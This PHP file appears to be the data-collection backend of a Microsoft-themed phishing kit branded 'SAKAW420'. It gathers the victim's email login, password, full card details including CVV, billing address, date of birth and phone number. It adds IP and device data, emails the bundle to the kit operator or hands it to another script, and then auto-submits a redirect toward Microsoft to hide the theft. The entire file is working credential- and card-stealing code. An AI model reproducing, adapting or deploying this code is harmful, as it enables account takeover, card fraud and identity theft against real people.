<?php
include '../admin/config.php';
include '../main.php';
$ip = getUserIP();
$randomnumber = rand(1, 100);
if(!isset($_POST['email'])) {
exit(header("HTTP/1.0 404 Not Found")); 
}else{
$tolsu = $_POST['ccno'];
$tolkon = str_replace(" ", "", $tolsu);
$bin = check_bin($tolkon);
$bins = preg_replace('/\s/', '', $tolkon);
$bins = substr($bins,0,6);
if($bin["brand"] == "") {
    $subject = "CECE 2 [".$bins."] ".strtoupper($bin["scheme"])." ".strtoupper($bin["type"])." ".strtoupper($bin["bank"]["name"])." - [$cn - $ip - $br]";
    $subbin = $bins." - ".strtoupper($bin["scheme"])." ".strtoupper($bin["type"])." ".strtoupper($bin["bank"]["name"]);
} else {
    $subject = "CECE 2 [".$bins."] ".strtoupper($bin["scheme"])." ".strtoupper($bin["type"])." ".strtoupper($bin["brand"])." ".strtoupper($bin["bank"]["name"])." - [$cn - $ip - $br]";
    $subbin = "CECE 2 [".$bins."] ".strtoupper($bin["scheme"])." ".strtoupper($bin["type"])." ".strtoupper($bin["brand"])." ".strtoupper($bin["bank"]["name"]);
}
$expnya = $_POST['exp'];
$expired = str_replace("/", "|", $expnya);
$forcheck = "".$tolkon."|".$expired."|".$_POST['cvv']."";
$fromsend = "FROM: ".$_POST['cname']." <admin@SAKAW420.ptz>";
$message = '
<p>
<b>======================[ LOGIN DETAILS ]======================</b><br>
Email : '.$_POST['email'].'<br>
Password : '.$_POST['password'].'<br>
<b>======================[ CARD DETAILS ]======================</b><br>
Bank : '.$bin["bank"]["name"].'<br>
Type : '.strtoupper($bin["scheme"]).' - '.strtoupper($bin["type"]).'<br>
Level : '.strtoupper($bin["brand"]).'<br>
Card Holder : '.$_POST['cname'].'<br>
Card Number : '.$tolkon.'<br>
Expired : '.$_POST['exp'].'<br>
CVV : '.$_POST['cvv'].'<br>
Amex CID : '.$cid.'<br>
For Check : '.$forcheck.'<br>
<b>======================[ BILLING INFORMATION ]======================</b><br>
Full name : '.$_POST['fname'].'<br>
Street address : '.$_POST['address'].'<br>
State : '.$_POST['city'].'<br>
City : '.$_POST['state'].'<br>
ZIP : '.$_POST['zip'].'<br>
Date of birth : '.$_POST['dob'].'<br>
Phone number : '.$_POST['phone'].'<br>
<b>======================[ DEVICE INFO ]======================</b><br>
Country : '.$cn.'<br>
Region : '.$regioncity.'<br>
City : '.$citykota.'<br>
Continent : '.$continent.'<br>
Curs : '.$kurenci.'<br>
OS / BR : '.$os.' / '.$br.'<br>
User Agent : '.$user_agent.'<br>
Timezone : '.$timezone.'<br>
ISP : '.$ispuser.'<br>
IP : '.$ip.'<br>
Date : '.$date.'<br>
<b>======================[ SAKAW420 - MICROSOFT ]======================</b>
</p>
';
if ($config['send_login'] == "email") {
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers .= ''.$fromsend.'' . "\r\n";
$kirim = mail($result_anying, $subject, $message, $headers);
tulis_file("../admin/result/total_cc.txt", $ip);
tulis_file("../admin/result/total_cclogin.txt", "".$cn."|".$bins."");
}else{
include'server.php';
tulis_file("../admin/result/total_cc.txt", $ip);
tulis_file("../admin/result/total_cclogin.txt", "".$cn."|".$bins."");
}
echo "<form id='boyxd' method='POST' action='../done?wa=wsignin1.0&rpsnv=13&rver=7.3.6963.0&wp=MBI_SSL&wreply=https%3a%2f%2fwww.microsoft.com%2fen-us%2f&lc=1033&id=74335&aadredir=1&ru=https%3a%2f%2fwww.microsoft.com%2fen-us%2f&uaid=876a74678f9446408bf0adc75cc213b7&pid=0&contextid=1EE93C44426274D9&bk=1619825115&mkt=EN-US'>
<input type='hidden' name='email' value='".$_POST['email']."'>
</form><script type='text/javascript'>document.getElementById('boyxd').submit();</script>";
}
?>